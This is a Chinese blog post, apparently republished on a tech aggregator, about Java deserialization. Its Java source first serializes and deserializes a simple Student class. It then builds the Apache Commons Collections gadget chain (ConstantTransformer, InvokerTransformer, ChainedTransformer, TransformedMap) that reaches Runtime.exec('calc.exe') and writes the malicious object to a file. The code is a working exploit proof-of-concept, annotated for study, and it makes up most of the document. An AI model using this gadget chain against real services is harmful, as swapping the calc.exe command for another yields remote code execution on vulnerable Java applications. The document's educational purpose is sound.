java 反序列化

時間  2020-05-30
標籤 java 序列 欄目 Java 简体版
原文   原文鏈接 
/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package helloworld;

import java.io.*;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

/**
 *
 * @author gaolongyun
 */

public class Helloworld {
     public static void main( String[] args ) throws ClassNotFoundException, IOException
        {
            System.out.println( "Hello World!" );
            run();//序列化
            //test();
            run2();//反序列化
                test();
        }

     // 序列化
     public static void run() throws ClassNotFoundException, IOException
     {
         FileOutputStream fis = new FileOutputStream("D:/bin.bin");
         ObjectOutputStream ois = new ObjectOutputStream(fis);
         Student a = new Student();
         a.setName("AAAA");
         ois.writeObject(a);;
     }

     //反序列化
     public static void run2() throws ClassNotFoundException, IOException
     {
         FileInputStream fis = new FileInputStream("D:/bin.bin");
         ObjectInputStream ois = new ObjectInputStream(fis);
         Student b = (Student)(ois.readObject());
         System.out.println(b.getName());

     }

     // commoncollections poc
     public static void test() 
     {
//              //第一個參數getMethod是方法名,第二個參數是參數類型,第三個參數是參數值
                //InvokerTransformer:Java的反射機制來調用任意函數
//      InvokerTransformer tran = new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class},new Object[] {"getRuntime",null});
//      //System.out.println(tran.transform(Runtime.class).toString()); //獲取類的屬性
//      //transform方法反射機制
//      Method method = (Method) tran.transform(Runtime.class);
//      
//                //invoke方法
//      InvokerTransformer tran2 = new InvokerTransformer("invoke",new Class[] {Object.class,Object[].class},new Object[] {null,null});
//      //獲取Runtime類的屬性
//      Runtime run = (Runtime) tran2.transform(method);
//      InvokerTransformer tran3 = new InvokerTransformer("exec", new Class[] {
//              String.class},new Object[] {
//      "calc.exe"});
//      
//      tran3.transform(run);

//      //Runtime run = 

         ChainedTransformer chain = null;
                 ConstantTransformer constantTransformer = new ConstantTransformer(Runtime.class);

         Transformer[] ttt = new Transformer[]
                 {
                         //new ConstantTransformer(Runtime.class);
                         new ConstantTransformer(Runtime.class),
                         new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class},new Object[] {"getRuntime",null}),
                         new InvokerTransformer("invoke",new Class[] {
                                    Object.class,Object[].class},new Object[] {
                                            null,null}),
                         new InvokerTransformer("exec", new Class[] {
                                            String.class},new Object[] {
                                    "calc.exe"}),
                        // new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class},new Object[] {"getRuntime",null});
                 };
         ChainedTransformer transformedChain = new ChainedTransformer(ttt);

         Map innerMap = new HashMap();
         innerMap.put("value", "value");
         Map outerMap = TransformedMap.decorate(innerMap, null, transformedChain);

         ObjectOutputStream ois;
        try {
            FileOutputStream fis = new FileOutputStream("D:/bin.bin");
            ois = new ObjectOutputStream(fis);

             ois.writeObject(outerMap);;
        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

         Map.Entry onlyElement = (Entry) outerMap.entrySet().iterator().next();
         onlyElement.setValue("foobar");
     }

}

// 序列化的對象
class Student implements Serializable {
    private String name;
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    private void readObject(java.io.ObjectInputStream in) throws ClassNotFoundException, IOException
    {
        in.defaultReadObject();
        //Runtime.getRuntime().exec("calc.exe");
        System.out.println("觸發反序列化函數-ReadObject()");//反序列化
    }
}

referer:
https://www.yuque.com/melodyzx/fs56rc/tbwa1z
http://www.bubuko.com/infodetail-2498979.html
https://xz.aliyun.com/t/2479
https://paper.seebug.org/584/
http://www.javashuo.com/article/p-vxflecvv-nd.html
http://www.javashuo.com/article/p-dpprckug-nd.htmlhtml

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程